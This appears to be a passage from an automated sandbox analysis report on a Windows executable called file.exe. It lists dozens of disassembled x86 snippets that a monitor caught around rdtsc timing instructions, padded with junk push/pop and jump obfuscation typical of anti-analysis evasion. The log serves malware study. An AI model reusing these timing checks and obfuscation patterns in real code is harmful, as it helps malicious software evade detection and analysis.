                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DDCC6 second address: 9DDD31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44D4E190h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F0C44D4E195h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jmp 00007F0C44D4E18Eh 0x00000019 pop eax 0x0000001a xor ecx, dword ptr [ebp+122D2C73h] 0x00000020 lea ebx, dword ptr [ebp+1243FAB0h] 0x00000026 xchg eax, ebx 0x00000027 jmp 00007F0C44D4E196h 0x0000002c push eax 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 jc 00007F0C44D4E186h 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DDDC7 second address: 9DDDD1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0C44E7DD66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DDDD1 second address: 9DDDEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F0C44D4E186h 0x00000009 jo 00007F0C44D4E186h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jc 00007F0C44D4E188h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DDDEE second address: 9DDDF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DDDF4 second address: 9DDE2E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0C44D4E186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d call 00007F0C44D4E198h 0x00000012 or dword ptr [ebp+122D1E3Fh], eax 0x00000018 pop esi 0x00000019 push 00000000h 0x0000001b stc 0x0000001c push E4A02FBFh 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DDE2E second address: 9DDE32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DDE32 second address: 9DDE38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DDE38 second address: 9DDEAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 1B5FD0C1h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F0C44E7DD68h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b push 00000003h 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007F0C44E7DD68h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 push 00000000h 0x00000049 mov dword ptr [ebp+122D249Ah], esi 0x0000004f push 00000003h 0x00000051 mov cx, ax 0x00000054 call 00007F0C44E7DD69h 0x00000059 jl 00007F0C44E7DD74h 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DDEAC second address: 9DDEB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DDEB0 second address: 9DDF07 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jl 00007F0C44E7DD97h 0x0000000d pushad 0x0000000e jmp 00007F0C44E7DD78h 0x00000013 jmp 00007F0C44E7DD77h 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d push edi 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F0C44E7DD72h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DDF07 second address: 9DDF0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DDF0B second address: 9DDF62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F0C44E7DD6Eh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 js 00007F0C44E7DD6Eh 0x00000018 push edi 0x00000019 jc 00007F0C44E7DD66h 0x0000001f pop edi 0x00000020 pop eax 0x00000021 mov si, di 0x00000024 lea ebx, dword ptr [ebp+1243FAB9h] 0x0000002a push 00000000h 0x0000002c push ebp 0x0000002d call 00007F0C44E7DD68h 0x00000032 pop ebp 0x00000033 mov dword ptr [esp+04h], ebp 0x00000037 add dword ptr [esp+04h], 00000015h 0x0000003f inc ebp 0x00000040 push ebp 0x00000041 ret 0x00000042 pop ebp 0x00000043 ret 0x00000044 xchg eax, ebx 0x00000045 push eax 0x00000046 push edx 0x00000047 push ebx 0x00000048 push ebx 0x00000049 pop ebx 0x0000004a pop ebx 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F0B2A second address: 9F0B45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44D4E197h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F0B45 second address: 9F0B52 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F0B52 second address: 9F0B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007F0C44D4E190h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1A74 second address: 9D1A92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F0C44E7DD66h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F0C44E7DD6Eh 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1A92 second address: 9D1AB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0C44D4E186h 0x0000000a popad 0x0000000b push edx 0x0000000c jmp 00007F0C44D4E195h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1AB5 second address: 9D1AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1AC0 second address: 9D1AC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1AC4 second address: 9D1AC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1AC8 second address: 9D1AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0C44D4E186h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0C44D4E196h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FD33E second address: 9FD352 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F0C44E7DD6Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FD76A second address: 9FD779 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44D4E18Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FD779 second address: 9FD77E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FD8EF second address: 9FD920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007F0C44D4E18Dh 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0C44D4E199h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FDA6D second address: 9FDA75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FDA75 second address: 9FDA7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FDD6D second address: 9FDD8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44E7DD6Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F0C44E7DD84h 0x0000000f pushad 0x00000010 ja 00007F0C44E7DD66h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE046 second address: 9FE04A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE04A second address: 9FE04E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE04E second address: 9FE06D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44D4E195h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE1D2 second address: 9FE1D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE1D8 second address: 9FE1E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE1E2 second address: 9FE1EC instructions: 0x00000000 rdtsc 0x00000002 js 00007F0C44E7DD6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE31C second address: 9FE353 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0C44D4E18Eh 0x00000008 jmp 00007F0C44D4E197h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push edi 0x00000011 push edi 0x00000012 pop edi 0x00000013 jl 00007F0C44D4E186h 0x00000019 pop edi 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE353 second address: 9FE359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE4C2 second address: 9FE4F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44D4E192h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F0C44D4E18Ch 0x0000000f jbe 00007F0C44D4E186h 0x00000015 jmp 00007F0C44D4E18Eh 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE4F8 second address: 9FE4FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5AA6 second address: 9F5AB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a js 00007F0C44D4E186h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5AB8 second address: 9F5ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5ABD second address: 9F5AD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0C44D4E18Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CB073 second address: 9CB08D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44E7DD6Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F0C44E7DD66h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CB08D second address: 9CB091 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE65F second address: 9FE689 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44E7DD78h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F0C44E7DD76h 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FED87 second address: 9FED8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FEEFE second address: 9FEF0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0C44E7DD66h 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FF0F6 second address: 9FF0FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01F6D second address: A01F9A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0C44E7DD66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0C44E7DD74h 0x0000000f push ecx 0x00000010 jmp 00007F0C44E7DD6Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A076F9 second address: A076FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0783D second address: A0785A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44E7DD79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0B21B second address: A0B237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F0C44D4E197h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0B237 second address: A0B246 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C44E7DD6Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0B246 second address: A0B295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jno 00007F0C44D4E186h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jbe 00007F0C44D4E192h 0x00000012 ja 00007F0C44D4E186h 0x00000018 jc 00007F0C44D4E186h 0x0000001e pop edx 0x0000001f pop eax 0x00000020 pushad 0x00000021 jmp 00007F0C44D4E193h 0x00000026 jmp 00007F0C44D4E193h 0x0000002b jns 00007F0C44D4E18Ch 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0A7C3 second address: A0A7C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0A7C7 second address: A0A7CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0A7CB second address: A0A7E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0C44E7DD74h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0A7E7 second address: A0A7EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0AD99 second address: A0ADD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44E7DD73h 0x00000009 je 00007F0C44E7DD66h 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 push ebx 0x00000013 jmp 00007F0C44E7DD76h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0ADD2 second address: A0ADD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0ADD7 second address: A0ADDC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0B08F second address: A0B0B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jnc 00007F0C44D4E186h 0x0000000c jmp 00007F0C44D4E199h 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DE1D second address: A0DE5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 add dword ptr [esp], 4E468E62h 0x0000000e call 00007F0C44E7DD69h 0x00000013 jno 00007F0C44E7DD83h 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DE5D second address: A0DE76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44D4E194h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DE76 second address: A0DE7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DE7C second address: A0DEA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44D4E193h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DEA4 second address: A0DEA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DEA8 second address: A0DEB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DEB6 second address: A0DEC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DEC0 second address: A0DEDD instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0C44D4E186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 pushad 0x00000011 jmp 00007F0C44D4E18Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0E038 second address: A0E043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0C44E7DD66h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0E2FC second address: A0E300 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0E3FD second address: A0E40C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0E40C second address: A0E41A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44D4E18Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0E41A second address: A0E429 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C44E7DD6Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0E5A8 second address: A0E5AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0EBD6 second address: A0EBE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0EBE4 second address: A0EBEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0ED69 second address: A0ED6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0ED6D second address: A0ED7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44D4E18Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0EF51 second address: A0EF67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44E7DD6Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push ecx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0F618 second address: A0F6A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ecx 0x00000009 call 00007F0C44D4E188h 0x0000000e pop ecx 0x0000000f mov dword ptr [esp+04h], ecx 0x00000013 add dword ptr [esp+04h], 0000001Bh 0x0000001b inc ecx 0x0000001c push ecx 0x0000001d ret 0x0000001e pop ecx 0x0000001f ret 0x00000020 xor dword ptr [ebp+122D1DF2h], ebx 0x00000026 mov edi, dword ptr [ebp+122D27D5h] 0x0000002c xor si, 2FAEh 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ebp 0x00000036 call 00007F0C44D4E188h 0x0000003b pop ebp 0x0000003c mov dword ptr [esp+04h], ebp 0x00000040 add dword ptr [esp+04h], 0000001Ah 0x00000048 inc ebp 0x00000049 push ebp 0x0000004a ret 0x0000004b pop ebp 0x0000004c ret 0x0000004d mov dword ptr [ebp+122D24CEh], edi 0x00000053 mov dword ptr [ebp+122D2808h], edx 0x00000059 push 00000000h 0x0000005b push eax 0x0000005c or di, 12B6h 0x00000061 pop esi 0x00000062 xchg eax, ebx 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F0C44D4E199h 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0F6A7 second address: A0F6CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F0C44E7DD66h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushad 0x00000011 jmp 00007F0C44E7DD75h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11C0E second address: A11C12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
